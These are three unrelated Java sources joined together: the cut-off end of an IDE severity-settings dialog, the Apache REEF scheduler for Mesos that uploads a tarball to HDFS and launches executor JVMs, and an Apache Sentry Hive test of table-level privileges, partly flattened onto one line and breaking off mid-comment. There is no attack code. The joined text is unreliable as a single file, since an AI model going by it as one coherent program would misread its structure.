      if (!SeverityRegistrar.isDefaultSeverity(info.getSeverity())) {
        // anything left in infoTypes after this loop was removed by the user and is unregistered below
        infoTypes.remove(info);
        final Color stripeColor = info.getAttributes().getErrorStripeColor();
        final boolean exists = mySeverityRegistrar.getSeverity(info.getSeverity().getName()) != null;
        if (exists) {
          info.getType().getAttributesKey().getDefaultAttributes().setErrorStripeColor(stripeColor);
        }
        else {
          // a brand-new severity: rebuild its attributes key with the chosen stripe color
          HighlightInfoType.HighlightInfoTypeImpl type = info.getType();
          TextAttributesKey key = type.getAttributesKey();
          final TextAttributes defaultAttributes = key.getDefaultAttributes().clone();
          defaultAttributes.setErrorStripeColor(stripeColor);
          key = TextAttributesKey.createTextAttributesKey(key.getExternalName(), defaultAttributes);
          type = new HighlightInfoType.HighlightInfoTypeImpl(type.getSeverity(null), key);
          info = new SeverityBasedTextAttributes(info.getAttributes(), type);
        }
        mySeverityRegistrar.registerSeverity(info, stripeColor != null ? stripeColor : LightColors.YELLOW);
      }
    }
    for (SeverityBasedTextAttributes info : infoTypes) {
      mySeverityRegistrar.unregisterSeverity(info.getSeverity());
    }
    mySeverityRegistrar.setOrder(order);
    super.doOKAction();
  }

  @Override
  @Nullable
  protected JComponent createCenterPanel() {
    return myPanel;
  }

  /** Returns the highlight type of the currently selected list entry, or {@code null}. */
  @Nullable
  public HighlightInfoType getSelectedType() {
    final SeverityBasedTextAttributes selection = myOptionsList.getSelectedValue();
    return selection != null ? selection.getType() : null;
  }

  /** Text-attributes description with the error-stripe option always enabled. */
  private static class MyTextAttributesDescription extends TextAttributesDescription {
    public MyTextAttributesDescription(final String name,
                                       final String group,
                                       final TextAttributes attributes,
                                       final TextAttributesKey type) {
      super(name, group, attributes, type, null, null, null);
    }

    @Override
    public boolean isErrorStripeEnabled() {
      return true;
    }

    @Override
    public TextAttributes getTextAttributes() {
      return super.getTextAttributes();
    }
  }
}
/*
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 *   http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied.  See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */
package org.apache.reef.runtime.mesos.driver;

import com.google.protobuf.ByteString;
import org.apache.mesos.MesosSchedulerDriver;
import org.apache.reef.proto.ReefServiceProtos;
import org.apache.reef.runtime.common.driver.api.ResourceReleaseEvent;
import org.apache.reef.runtime.common.driver.api.ResourceRequestEvent;
import org.apache.reef.runtime.common.driver.api.ResourceRequestEventImpl;
import org.apache.reef.runtime.common.driver.evaluator.pojos.State;
import org.apache.reef.runtime.common.driver.parameters.JobIdentifier;
import org.apache.reef.runtime.common.driver.resourcemanager.NodeDescriptorEventImpl;
import org.apache.reef.runtime.common.driver.resourcemanager.ResourceAllocationEvent;
import org.apache.reef.runtime.common.driver.resourcemanager.ResourceEventImpl;
import org.apache.reef.runtime.common.driver.resourcemanager.ResourceStatusEvent;
import org.apache.reef.runtime.common.driver.resourcemanager.ResourceStatusEventImpl;
import org.apache.reef.runtime.common.driver.resourcemanager.RuntimeStatusEventImpl;
import org.apache.reef.runtime.common.files.ClasspathProvider;
import org.apache.reef.runtime.common.files.REEFFileNames;
import org.apache.reef.runtime.mesos.driver.parameters.MesosMasterIp;
import org.apache.reef.runtime.mesos.driver.parameters.MesosSlavePort;
import org.apache.reef.runtime.mesos.driver.parameters.JobSubmissionDirectoryPrefix;
import org.apache.reef.runtime.mesos.evaluator.REEFExecutor;
import org.apache.reef.runtime.mesos.util.EvaluatorControl;
import org.apache.reef.runtime.mesos.util.EvaluatorRelease;
import org.apache.reef.runtime.mesos.util.MesosRemoteManager;
import org.apache.reef.tang.annotations.Parameter;
import org.apache.reef.wake.EStage;
import org.apache.reef.wake.EventHandler;
import org.apache.reef.wake.remote.Encoder;
import org.apache.reef.wake.remote.impl.ObjectSerializableCodec;
import org.apache.commons.compress.archivers.tar.TarArchiveEntry;
import org.apache.commons.compress.archivers.tar.TarArchiveOutputStream;
import org.apache.commons.compress.utils.IOUtils;
import org.apache.commons.lang.StringUtils;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FileSystem;
import org.apache.mesos.Protos;
import org.apache.mesos.Protos.CommandInfo;
import org.apache.mesos.Protos.CommandInfo.URI;
import org.apache.mesos.Protos.ExecutorID;
import org.apache.mesos.Protos.ExecutorInfo;
import org.apache.mesos.Protos.Filters;
import org.apache.mesos.Protos.Offer;
import org.apache.mesos.Protos.Resource;
import org.apache.mesos.Protos.TaskID;
import org.apache.mesos.Protos.TaskInfo;
import org.apache.mesos.Protos.Value;
import org.apache.mesos.Protos.Value.Type;
import org.apache.mesos.Scheduler;
import org.apache.mesos.SchedulerDriver;

import javax.inject.Inject;
import java.io.BufferedInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.file.DirectoryStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ConcurrentLinkedQueue;
import java.util.logging.Level;
import java.util.logging.Logger;
import java.util.zip.GZIPOutputStream;

/**
 * MesosScheduler that interacts with MesosMaster and MesosExecutors.
 */
final class REEFScheduler implements Scheduler {
  private static final Logger LOG = Logger.getLogger(REEFScheduler.class.getName());
  private static final String REEF_TAR = "reef.tar.gz";
  private static final String RUNTIME_NAME = "MESOS";
  private static final String REEF_JOB_NAME_PREFIX = "reef-job-";

  // HDFS URI of the packaged REEF distribution fetched by every Mesos executor
  private final String reefTarUri;
  private final REEFFileNames fileNames;
  private final ClasspathProvider classpath;
  private final REEFEventHandlers reefEventHandlers;
  private final MesosRemoteManager mesosRemoteManager;

  private final SchedulerDriver mesosMaster;
  private int mesosSlavePort;
  private final String jobSubmissionDirectoryPrefix;
  private final EStage<SchedulerDriver> schedulerDriverEStage;
  // offers currently held; valid only until the next doResourceRequest pass clears them
  private final Map<String, Offer> offers = new ConcurrentHashMap<>();

  private int outstandingRequestCounter = 0;
  // requests (or request remainders) waiting for matching offers
  private final ConcurrentLinkedQueue<ResourceRequestEvent> outstandingRequests = new ConcurrentLinkedQueue<>();
  // executor/task id -> the request it was launched for, until TASK_STARTING arrives
  private final Map<String, ResourceRequestEvent> executorIdToLaunchedRequests = new ConcurrentHashMap<>();
  private final REEFExecutors executors;

  @Inject
  REEFScheduler(final REEFEventHandlers reefEventHandlers,
                final MesosRemoteManager mesosRemoteManager,
                final REEFExecutors executors,
                final REEFFileNames fileNames,
                final EStage<SchedulerDriver> schedulerDriverEStage,
                final ClasspathProvider classpath,
                @Parameter(JobIdentifier.class) final String jobIdentifier,
                @Parameter(MesosMasterIp.class) final String masterIp,
                @Parameter(MesosSlavePort.class) final int slavePort,
                @Parameter(JobSubmissionDirectoryPrefix.class) final String jobSubmissionDirectoryPrefix) {
    this.mesosRemoteManager = mesosRemoteManager;
    this.reefEventHandlers = reefEventHandlers;
    this.executors = executors;
    this.fileNames = fileNames;
    this.jobSubmissionDirectoryPrefix = jobSubmissionDirectoryPrefix;
    // packages and uploads the REEF distribution; may throw RuntimeException on I/O failure
    this.reefTarUri = getReefTarUri(jobIdentifier);
    this.classpath = classpath;
    this.schedulerDriverEStage = schedulerDriverEStage;

    final Protos.FrameworkInfo frameworkInfo = Protos.FrameworkInfo.newBuilder()
        .setUser("")
        .setName(REEF_JOB_NAME_PREFIX + jobIdentifier)
        .build();
    this.mesosMaster = new MesosSchedulerDriver(this, frameworkInfo, masterIp);
    this.mesosSlavePort = slavePort;
  }

  @Override
  public void registered(final SchedulerDriver driver,
                         final Protos.FrameworkID frameworkId,
                         final Protos.MasterInfo masterInfo) {
    LOG.log(Level.INFO, "Framework ID={0} registration succeeded", frameworkId);
  }

  @Override
  public void reregistered(final SchedulerDriver driver, final Protos.MasterInfo masterInfo) {
    LOG.log(Level.INFO, "Framework reregistered, MasterInfo: {0}", masterInfo);
  }

  /**
   * All offers in each batch of offers will be either be launched or declined.
   */
  @Override
  @SuppressWarnings("checkstyle:hiddenfield")
  public void resourceOffers(final SchedulerDriver driver, final List<Protos.Offer> offers) {
    // aggregate per-slave node descriptors (one slave may appear in several offers)
    final Map<String, NodeDescriptorEventImpl.Builder> nodeDescriptorEvents = new HashMap<>();
    for (final Offer offer : offers) {
      if (nodeDescriptorEvents.get(offer.getSlaveId().getValue()) == null) {
        nodeDescriptorEvents.put(offer.getSlaveId().getValue(), NodeDescriptorEventImpl.newBuilder()
            .setIdentifier(offer.getSlaveId().getValue())
            .setHostName(offer.getHostname())
            .setPort(this.mesosSlavePort)
            .setMemorySize(getMemory(offer)));
      } else {
        final NodeDescriptorEventImpl.Builder builder = nodeDescriptorEvents.get(offer.getSlaveId().getValue());
        builder.setMemorySize(builder.build().getMemorySize() + getMemory(offer));
      }
      this.offers.put(offer.getId().getValue(), offer);
    }

    for (final NodeDescriptorEventImpl.Builder ndpBuilder : nodeDescriptorEvents.values()) {
      this.reefEventHandlers.onNodeDescriptor(ndpBuilder.build());
    }

    // try to satisfy one outstanding request with the new batch of offers
    if (outstandingRequests.size() > 0) {
      doResourceRequest(outstandingRequests.remove());
    }
  }

  @Override
  public void offerRescinded(final SchedulerDriver driver, final Protos.OfferID offerId) {
    // executor ids are derived from offer ids ("<offerId>-<n>"); re-queue affected requests
    for (final String executorId : this.executorIdToLaunchedRequests.keySet()) {
      if (executorId.startsWith(offerId.getValue())) {
        this.outstandingRequests.add(this.executorIdToLaunchedRequests.remove(executorId));
      }
    }
  }

  @Override
  public void statusUpdate(final SchedulerDriver driver, final Protos.TaskStatus taskStatus) {
    // FIX: the message previously had no {0} placeholder, so the status parameter was
    // silently dropped from the log record.
    LOG.log(Level.SEVERE, "Task Status Update: {0}", taskStatus.toString());

    final ResourceStatusEventImpl.Builder resourceStatus =
        ResourceStatusEventImpl.newBuilder().setIdentifier(taskStatus.getTaskId().getValue());

    switch(taskStatus.getState()) {
    case TASK_STARTING:
      handleNewExecutor(taskStatus); // As there is only one Mesos Task per Mesos Executor, this is a new executor.
      return;
    case TASK_RUNNING:
      resourceStatus.setState(State.RUNNING);
      break;
    case TASK_FINISHED:
      if (taskStatus.getData().toStringUtf8().equals("eval_not_run")) {
        // TODO[JIRA REEF-102]: a hack to pass closeEvaluator test, replace this with a better interface
        return;
      }
      resourceStatus.setState(State.DONE);
      break;
    case TASK_KILLED:
      resourceStatus.setState(State.KILLED);
      break;
    case TASK_LOST:
    case TASK_FAILED:
      resourceStatus.setState(State.FAILED);
      break;
    case TASK_STAGING:
      throw new RuntimeException("TASK_STAGING should not be used for status update");
    default:
      throw new RuntimeException("Unknown TaskStatus");
    }

    if (taskStatus.getMessage() != null) {
      resourceStatus.setDiagnostics(taskStatus.getMessage());
    }

    this.reefEventHandlers.onResourceStatus(resourceStatus.build());
  }

  @Override
  public void frameworkMessage(final SchedulerDriver driver,
                               final Protos.ExecutorID executorId,
                               final Protos.SlaveID slaveId,
                               final byte[] data) {
    LOG.log(Level.INFO, "Framework Message. driver: {0} executorId: {1} slaveId: {2} data: {3}",
        new Object[]{driver, executorId, slaveId, data});
  }

  @Override
  public void disconnected(final SchedulerDriver driver) {
    this.onRuntimeError(new RuntimeException("Scheduler disconnected from MesosMaster"));
  }

  @Override
  public void slaveLost(final SchedulerDriver driver, final Protos.SlaveID slaveId) {
    LOG.log(Level.SEVERE, "Slave Lost. {0}", slaveId.getValue());
  }

  @Override
  public void executorLost(final SchedulerDriver driver,
                           final Protos.ExecutorID executorId,
                           final Protos.SlaveID slaveId,
                           final int status) {
    final String diagnostics = "Executor Lost. executorid: " + executorId.getValue()
        + " slaveid: " + slaveId.getValue();
    final ResourceStatusEvent resourceStatus =
        ResourceStatusEventImpl.newBuilder()
            .setIdentifier(executorId.getValue())
            .setState(State.FAILED)
            .setExitCode(status)
            .setDiagnostics(diagnostics)
            .build();
    this.reefEventHandlers.onResourceStatus(resourceStatus);
  }

  @Override
  public void error(final SchedulerDriver driver, final String message) {
    this.onRuntimeError(new RuntimeException(message));
  }

  /////////////////////////////////////////////////////////////////
  // HELPER METHODS

  public void onStart() {
    this.schedulerDriverEStage.onNext(this.mesosMaster);
  }

  public void onStop() {
    this.mesosMaster.stop();
    try {
      this.schedulerDriverEStage.close();
    } catch (final Exception e) {
      throw new RuntimeException(e);
    }
  }

  public void onResourceRequest(final ResourceRequestEvent resourceRequestEvent) {
    this.outstandingRequestCounter += resourceRequestEvent.getResourceCount();
    updateRuntimeStatus();
    doResourceRequest(resourceRequestEvent);
  }

  public void onResourceRelease(final ResourceReleaseEvent resourceReleaseEvent) {
    this.executors.releaseEvaluator(new EvaluatorRelease(resourceReleaseEvent.getIdentifier()));
    this.executors.remove(resourceReleaseEvent.getIdentifier());
    updateRuntimeStatus();
  }

  /**
   * Greedily acquire resources by launching a Mesos Task(w/ our custom MesosExecutor) on REEF Evaluator request.
   * Either called from onResourceRequest(for a new request) or resourceOffers(for an outstanding request).
   * TODO[JIRA REEF-102]: reflect priority and rack/node locality specified in resourceRequestEvent.
   */
  private synchronized void doResourceRequest(final ResourceRequestEvent resourceRequestEvent) {
    int tasksToLaunchCounter = resourceRequestEvent.getResourceCount();

    for (final Offer offer : this.offers.values()) {
      final int cpuSlots = getCpu(offer) / resourceRequestEvent.getVirtualCores().get();
      final int memSlots = getMemory(offer) / resourceRequestEvent.getMemorySize().get();
      final int taskNum = Math.min(Math.min(cpuSlots, memSlots), tasksToLaunchCounter);

      if (taskNum > 0 && satisfySlaveConstraint(resourceRequestEvent, offer)) {
        final List<TaskInfo> tasksToLaunch = new ArrayList<>();
        tasksToLaunchCounter -= taskNum;

        // Launch as many MesosTasks on the same node(offer) as possible to exploit locality.
        for (int j = 0; j < taskNum; j++) {
          final String id = offer.getId().getValue() + "-" + String.valueOf(j);
          final String executorLaunchCommand = getExecutorLaunchCommand(id, resourceRequestEvent.getMemorySize().get());

          final ExecutorInfo executorInfo = ExecutorInfo.newBuilder()
              .setExecutorId(ExecutorID.newBuilder()
                  .setValue(id)
                  .build())
              .setCommand(CommandInfo.newBuilder()
                  .setValue(executorLaunchCommand)
                  .addUris(URI.newBuilder().setValue(reefTarUri).build())
                  .build())
              .build();

          final TaskInfo taskInfo = TaskInfo.newBuilder()
              .setTaskId(TaskID.newBuilder()
                  .setValue(id)
                  .build())
              .setName(id)
              .setSlaveId(offer.getSlaveId())
              .addResources(Resource.newBuilder()
                  .setName("mem")
                  .setType(Type.SCALAR)
                  .setScalar(Value.Scalar.newBuilder()
                      .setValue(resourceRequestEvent.getMemorySize().get())
                      .build())
                  .build())
              .addResources(Resource.newBuilder()
                  .setName("cpus")
                  .setType(Type.SCALAR)
                  .setScalar(Value.Scalar.newBuilder()
                      .setValue(resourceRequestEvent.getVirtualCores().get())
                      .build())
                  .build())
              .setExecutor(executorInfo)
              .build();

          tasksToLaunch.add(taskInfo);
          this.executorIdToLaunchedRequests.put(id, resourceRequestEvent);
        }

        final Filters filters = Filters.newBuilder().setRefuseSeconds(0).build();
        mesosMaster.launchTasks(Collections.singleton(offer.getId()), tasksToLaunch, filters);
      } else {
        mesosMaster.declineOffer(offer.getId());
      }
    }

    // the offers are no longer valid(all launched or declined)
    this.offers.clear();

    // Save leftovers that couldn't be launched
    // NOTE(review): enqueued even when the remainder is 0, which makes the next offer batch
    // process an empty request — presumably harmless, but worth confirming before guarding.
    outstandingRequests.add(ResourceRequestEventImpl.newBuilder()
        .mergeFrom(resourceRequestEvent)
        .setResourceCount(tasksToLaunchCounter)
        .build());
  }

  /**
   * Handles TASK_STARTING: registers the new executor, emits the corresponding resource
   * allocation, and decrements the outstanding request counter.
   */
  private void handleNewExecutor(final Protos.TaskStatus taskStatus) {
    final ResourceRequestEvent resourceRequestProto =
        this.executorIdToLaunchedRequests.remove(taskStatus.getTaskId().getValue());

    final EventHandler<EvaluatorControl> evaluatorControlHandler =
        this.mesosRemoteManager.getHandler(taskStatus.getMessage(), EvaluatorControl.class);
    this.executors.add(taskStatus.getTaskId().getValue(),
        resourceRequestProto.getMemorySize().get(), evaluatorControlHandler);

    final ResourceAllocationEvent alloc = ResourceEventImpl.newAllocationBuilder()
        .setIdentifier(taskStatus.getTaskId().getValue())
        .setNodeId(taskStatus.getSlaveId().getValue())
        .setResourceMemory(resourceRequestProto.getMemorySize().get())
        .setVirtualCores(resourceRequestProto.getVirtualCores().get())
        .setRuntimeName(RuntimeIdentifier.RUNTIME_NAME)
        .build();

    reefEventHandlers.onResourceAllocation(alloc);

    this.outstandingRequestCounter--;
    this.updateRuntimeStatus();
  }

  private synchronized void updateRuntimeStatus() {
    final RuntimeStatusEventImpl.Builder builder = RuntimeStatusEventImpl.newBuilder()
        .setName(RUNTIME_NAME)
        .setState(State.RUNNING)
        .setOutstandingContainerRequests(this.outstandingRequestCounter);

    for (final String executorId : this.executors.getExecutorIds()) {
      builder.addContainerAllocation(executorId);
    }

    this.reefEventHandlers.onRuntimeStatus(builder.build());
  }

  /** Stops the Mesos driver and reports a FAILED runtime status carrying the serialized cause. */
  private void onRuntimeError(final Throwable throwable) {
    this.mesosMaster.stop();
    try {
      this.schedulerDriverEStage.close();
    } catch (final Exception e) {
      throw new RuntimeException(e);
    }

    final RuntimeStatusEventImpl.Builder runtimeStatusBuilder = RuntimeStatusEventImpl.newBuilder()
        .setState(State.FAILED)
        .setName(RUNTIME_NAME);

    final Encoder<Throwable> codec = new ObjectSerializableCodec<>();
    runtimeStatusBuilder.setError(ReefServiceProtos.RuntimeErrorProto.newBuilder()
        .setName(RUNTIME_NAME)
        .setMessage(throwable.getMessage())
        .setException(ByteString.copyFrom(codec.encode(throwable)))
        .build());

    this.reefEventHandlers.onRuntimeStatus(runtimeStatusBuilder.build());
  }

  /** A request with an empty node-name list matches any slave; otherwise the slave must be listed. */
  private boolean satisfySlaveConstraint(final ResourceRequestEvent resourceRequestEvent, final Offer offer) {
    return resourceRequestEvent.getNodeNameList().size() == 0 ||
        resourceRequestEvent.getNodeNameList().contains(offer.getSlaveId().getValue());
  }

  /** Returns the offer's "mem" scalar (MB, truncated to int), or 0 if absent. */
  private int getMemory(final Offer offer) {
    for (final Resource resource : offer.getResourcesList()) {
      if (resource.getName().equals("mem")) {
        return (int)resource.getScalar().getValue();
      }
    }
    return 0;
  }

  /** Returns the offer's "cpus" scalar (truncated to int), or 0 if absent. */
  private int getCpu(final Offer offer) {
    for (final Resource resource : offer.getResourcesList()) {
      if (resource.getName().equals("cpus")) {
        return (int)resource.getScalar().getValue();
      }
    }
    return 0;
  }

  /** Builds the shell command each Mesos executor runs to start a REEFExecutor JVM. */
  private String getExecutorLaunchCommand(final String executorID, final int memorySize) {
    final String defaultJavaPath = System.getenv("JAVA_HOME") + "/bin/" + "java";
    final String classPath = "-classpath " + StringUtils.join(this.classpath.getEvaluatorClasspath(), ":");
    final String logging = "-Djava.util.logging.config.class=org.apache.reef.util.logging.Config";
    final String mesosExecutorId = "-mesos_executor_id " + executorID;

    return new StringBuilder()
        .append(defaultJavaPath + " ")
        .append("-XX:PermSize=128m" + " ")
        .append("-XX:MaxPermSize=128m" + " ")
        .append("-Xmx" + String.valueOf(memorySize) + "m" + " ")
        .append(classPath + " ")
        .append(logging + " ")
        .append(REEFExecutor.class.getName() + " ")
        .append(mesosExecutorId + " ")
        .toString();
  }

  /**
   * Tars the REEF global folder into {@link #REEF_TAR}, uploads it to the job's HDFS submission
   * directory, and returns the resulting URI (fetched by every Mesos executor).
   *
   * @throws RuntimeException wrapping any {@link IOException} from packaging or upload.
   */
  private String getReefTarUri(final String jobIdentifier) {
    try {
      // Create REEF_TAR
      final FileOutputStream fileOutputStream = new FileOutputStream(REEF_TAR);
      final TarArchiveOutputStream tarArchiveOutputStream =
          new TarArchiveOutputStream(new GZIPOutputStream(fileOutputStream));
      final File globalFolder = new File(this.fileNames.getGlobalFolderPath());
      final DirectoryStream<Path> directoryStream = Files.newDirectoryStream(globalFolder.toPath());

      for (final Path path : directoryStream) {
        tarArchiveOutputStream.putArchiveEntry(
            new TarArchiveEntry(path.toFile(), globalFolder + "/" + path.getFileName()));

        final BufferedInputStream bufferedInputStream =
            new BufferedInputStream(new FileInputStream(path.toFile()));
        IOUtils.copy(bufferedInputStream, tarArchiveOutputStream);
        bufferedInputStream.close();

        tarArchiveOutputStream.closeArchiveEntry();
      }
      directoryStream.close();
      tarArchiveOutputStream.close();
      fileOutputStream.close();

      // Upload REEF_TAR to HDFS
      final FileSystem fileSystem = FileSystem.get(new Configuration());
      final org.apache.hadoop.fs.Path src = new org.apache.hadoop.fs.Path(REEF_TAR);
      final String reefTarUriValue = fileSystem.getUri().toString() + this.jobSubmissionDirectoryPrefix + "/"
          + jobIdentifier + "/" + REEF_TAR;
      final org.apache.hadoop.fs.Path dst = new org.apache.hadoop.fs.Path(reefTarUriValue);
      fileSystem.copyFromLocalFile(src, dst);

      return reefTarUriValue;
    } catch (final IOException e) {
      throw new RuntimeException(e);
    }
  }
}
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.sentry.tests.e2e.hive; import static org.junit.Assert.assertFalse; import static org.junit.Assert.assertNotNull; import static org.junit.Assert.assertTrue; import java.io.File; import java.io.FileOutputStream; import java.sql.Connection; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; import junit.framework.Assert; import org.apache.sentry.provider.file.PolicyFile; import org.junit.Before; import org.junit.BeforeClass; import org.junit.Test; import com.google.common.io.Resources; /* Tests privileges at table scope within a single database. 
 */
public class TestPrivilegesAtTableScope extends AbstractTestWithStaticConfiguration {

  // Per-test Sentry policy; re-created in setup() via setupPolicy().
  private static PolicyFile policyFile;
  // Test data file copied from test resources; loaded into TBL1/TBL2
  // (pipe-delimited, matching the "B INT, A STRING" table definitions below).
  private final static String MULTI_TYPE_DATA_FILE_NAME = "emp.dat";

  @Before
  public void setup() throws Exception {
    // Fresh policy and base configuration first, then (re)build DB_1 so each
    // test starts from identical tables/view contents.
    policyFile = super.setupPolicy();
    super.setup();
    prepareDBDataForTest();
  }

  @BeforeClass
  public static void setupTestStaticConfiguration() throws Exception {
    AbstractTestWithStaticConfiguration.setupTestStaticConfiguration();
  }

  /**
   * As ADMIN1: drops and recreates database DB_1 with tables TBL1 and TBL2
   * (both loaded from the sample data file) and VIEW_1 defined over TBL1.
   */
  protected static void prepareDBDataForTest() throws Exception {
    // copy data file to test dir
    File dataDir = context.getDataDir();
    File dataFile = new File(dataDir, MULTI_TYPE_DATA_FILE_NAME);
    FileOutputStream to = new FileOutputStream(dataFile);
    Resources.copy(Resources.getResource(MULTI_TYPE_DATA_FILE_NAME), to);
    to.close();

    // setup db objects needed by the test
    Connection connection = context.createConnection(ADMIN1);
    Statement statement = context.createStatement(connection);
    statement.execute("DROP DATABASE IF EXISTS DB_1 CASCADE");
    statement.execute("CREATE DATABASE DB_1");
    statement.execute("USE DB_1");
    statement.execute("CREATE TABLE " + TBL1 + "(B INT, A STRING) "
        + " row format delimited fields terminated by '|' stored as textfile");
    statement.execute("LOAD DATA LOCAL INPATH '" + dataFile.getPath()
        + "' INTO TABLE " + TBL1);
    statement.execute("CREATE TABLE " + TBL2 + "(B INT, A STRING) "
        + " row format delimited fields terminated by '|' stored as textfile");
    statement.execute("LOAD DATA LOCAL INPATH '" + dataFile.getPath()
        + "' INTO TABLE " + TBL2);
    statement.execute("CREATE VIEW VIEW_1 AS SELECT A, B FROM " + TBL1);
    statement.close();
    connection.close();
  }

  /*
   * Admin creates database DB_1, table TBL1, TBL2 in DB_1, loads data into
   * TBL1, TBL2. Admin grants SELECT on TBL1, TBL2, INSERT on TBL1 to
   * USER_GROUP of which user1 is a member.
*/ @Test public void testInsertAndSelect() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "select_tab1", "insert_tab1", "select_tab2") .addPermissionsToRole("select_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=select") .addPermissionsToRole("insert_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=insert") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL2 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE DB_1"); // test user can insert statement.execute("INSERT INTO TABLE " + TBL1 + " SELECT A, B FROM " + TBL2); // test user can query table statement.executeQuery("SELECT A FROM " + TBL2); // negative test: test user can't drop try { statement.execute("DROP TABLE " + TBL1); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); // connect as admin and drop TBL1 connection = context.createConnection(ADMIN1); statement = context.createStatement(connection); statement.execute("USE DB_1"); statement.execute("DROP TABLE " + TBL1); statement.close(); connection.close(); // negative test: connect as user1 and try to recreate TBL1 connection = context.createConnection(USER1_1); statement = context.createStatement(connection); statement.execute("USE DB_1"); try { statement.execute("CREATE TABLE " + TBL1 + "(A STRING)"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); // connect as admin to restore the TBL1 connection = context.createConnection(ADMIN1); statement = context.createStatement(connection); statement.execute("USE DB_1"); statement.execute("CREATE TABLE " + TBL1 + "(B INT, A STRING) " + " row format delimited fields 
terminated by '|' stored as textfile"); statement.execute("INSERT INTO TABLE " + TBL1 + " SELECT A, B FROM " + TBL2); statement.close(); connection.close(); } /* * Admin creates database DB_1, table TBL1, TBL2 in DB_1, loads data into * TBL1, TBL2. Admin grants INSERT on TBL1, SELECT on TBL2 to USER_GROUP * of which user1 is a member. */ @Test public void testInsert() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "insert_tab1", "select_tab2") .addPermissionsToRole("insert_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=insert") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL2 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); // test user can execute insert on table statement.execute("INSERT INTO TABLE " + TBL1 + " SELECT A, B FROM " + TBL2); // negative test: user can't query table try { statement.executeQuery("SELECT A FROM " + TBL1); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } // negative test: test user can't query view try { statement.executeQuery("SELECT A FROM VIEW_1"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } // negative test case: show tables shouldn't list VIEW_1 ResultSet resultSet = statement.executeQuery("SHOW TABLES"); while (resultSet.next()) { String tableName = resultSet.getString(1); assertNotNull("table name is null in result set", tableName); assertFalse("Found VIEW_1 in the result set", "VIEW_1".equalsIgnoreCase(tableName)); } // negative test: test user can't create a new view try { statement.executeQuery("CREATE VIEW VIEW_2(A) AS SELECT A FROM " + TBL1); Assert.fail("Expected SQL Exception"); } catch (SQLException e) { context.verifyAuthzException(e); } 
statement.close(); connection.close(); } /* * Admin creates database DB_1, table TBL1, TBL2 in DB_1, loads data into * TBL1, TBL2. Admin grants SELECT on TBL1, TBL2 to USER_GROUP of which * user1 is a member. */ @Test public void testSelect() throws Exception { policyFile .addRolesToGroup(USERGROUP1, "select_tab1", "select_tab2") .addPermissionsToRole("select_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=select") .addPermissionsToRole("insert_tab1", "server=server1->db=DB_1->table=" + TBL1 + "->action=insert") .addPermissionsToRole("select_tab2", "server=server1->db=DB_1->table=" + TBL2 + "->action=select") .setUserGroupMapping(StaticUserGroup.getStaticMapping()); writePolicyFile(policyFile); // test execution Connection connection = context.createConnection(USER1_1); Statement statement = context.createStatement(connection); statement.execute("USE " + DB1); // test user can execute query on table statement.executeQuery("SELECT A FROM " + TBL1); // negative test: test insert into table try { statement.executeQuery("INSERT INTO TABLE " + TBL1 + " SELECT A, B FROM " + TBL2); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } // negative test: test user can't query view try { statement.executeQuery("SELECT A FROM VIEW_1"); Assert.fail("Expected SQL exception"); } catch (SQLException e) { context.verifyAuthzException(e); } // negative test: test user can't create a new view try { statement.executeQuery("CREATE VIEW VIEW_2(A) AS SELECT A FROM " + TBL1); Assert.fail("Expected SQL Exception"); } catch (SQLException e) { context.verifyAuthzException(e); } statement.close(); connection.close(); } /* * Admin creates database DB_1, table TBL1, TBL2 in DB_1, VIEW_1 on TBL1 * loads data into TBL1, TBL2. Admin grants SELECT on TBL1,TBL2 to * USER_GROUP of which user1 is a member. 
